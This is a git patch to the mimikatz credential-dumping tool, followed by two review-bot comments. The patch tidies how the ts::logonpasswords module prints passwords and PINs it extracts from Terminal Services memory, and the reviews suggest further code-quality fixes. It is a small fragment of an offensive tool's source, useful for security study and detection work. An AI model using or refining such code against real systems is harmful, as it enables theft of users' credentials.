From 7f02230226b04591f9685e74b6e50f14974b30f6 Mon Sep 17 00:00:00 2001 From: Benjamin DELPY Date: Tue, 10 Aug 2021 17:21:25 +0200 Subject: [PATCH] [fix] mimikatz ts::logonpassword removed junk data after credentials --- mimikatz/modules/kuhl_m_ts.c | 6 +++--- mimikatz/modules/kuhl_m_ts.h | 1 + mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c | 2 +- 3 files changed, 5 insertions(+), 4 deletions(-) diff --git a/mimikatz/modules/kuhl_m_ts.c b/mimikatz/modules/kuhl_m_ts.c index b67722d..19826b1 100644 --- a/mimikatz/modules/kuhl_m_ts.c +++ b/mimikatz/modules/kuhl_m_ts.c @@ -315,10 +315,10 @@ BOOL CALLBACK kuhl_m_ts_logonpasswords_MemoryAnalysis(PMEMORY_BASIC_INFORMATION if(decStatus) { dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t); - kprintf(L" Password/Pin: %s\n |_ supp data: ", pWebKiwiData->Password.Buffer); - kull_m_string_wprintf_hex((PBYTE) pWebKiwiData->Password.Buffer + dwOffset, pWebKiwiData->Password.Length - dwOffset, 1); - kprintf(L"\n"); + kprintf(L" Password/Pin: %s\n ", pWebKiwiData->Password.Buffer); } + else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password); + LocalFree(pWebKiwiData->Password.Buffer); } } diff --git a/mimikatz/modules/kuhl_m_ts.h b/mimikatz/modules/kuhl_m_ts.h index 8928938..08c4e22 100644 --- a/mimikatz/modules/kuhl_m_ts.h +++ b/mimikatz/modules/kuhl_m_ts.h @@ -10,6 +10,7 @@ #include "../../modules/kull_m_process.h" #include "../../modules/kull_m_memory.h" #include "../../modules/kull_m_crypto_remote.h" +#include "sekurlsa/kuhl_m_sekurlsa.h" const KUHL_M kuhl_m_ts; diff --git a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c index 8ec7320..f4c134e 100644 --- a/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c +++ b/mimikatz/modules/sekurlsa/kuhl_m_sekurlsa.c @@ -1419,7 +1419,7 @@ VOID kuhl_m_sekurlsa_trymarshal(PCUNICODE_STRING MarshaledCredential) kprintf(L"[UsernameForPacked] ?"); break; default: - kprintf(L"[?] ?"); + kprintf(L"[?] ? %u ?", type); } CredFree(Credential); }
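Review bot: The `dwOffset = (lstrlen(pWebKiwiData->Password.Buffer) + 1) * sizeof(wchar_t);` line kept as context in the kuhl_m_ts.c hunk has no reader left inside the hunk, because its only visible use was the removed `kull_m_string_wprintf_hex` call; unless it is read outside the hunk, the assignment and its `lstrlen` scan can be dropped. The new `kprintf` format still has whitespace after `\n`, which looks like a leftover from the removed `|_ supp data:` label, so ending the format at `%s\n` would avoid indenting whatever is printed next. The `%s` conversion relies on a terminator inside the buffer; bounding it by the known length, `kprintf(L" Password/Pin: %.*s\n", (int) (pWebKiwiData->Password.Length / sizeof(wchar_t)), pWebKiwiData->Password.Buffer);`, would keep the read inside the allocation if the data is not terminated. The `else kuhl_m_sekurlsa_trymarshal(&pWebKiwiData->Password);` branch runs only when `decStatus` is false, so a one-line comment saying why the buffer is still parsed in that case would help; the enclosing function starts and ends outside the hunk.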
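Review bot: In the `default:` case of kuhl_m_sekurlsa_trymarshal the new `%u` conversion receives `type` as-is, and its declaration is outside the hunk; if it is an enum such as CRED_MARSHAL_TYPE, an explicit cast keeps the variadic argument matching the specifier: `kprintf(L"[?] ? %u ?", (unsigned int) type);`. The number is also printed without a label, so a format such as `L"[?] type %u ?"` would make the diagnostic readable without the source at hand.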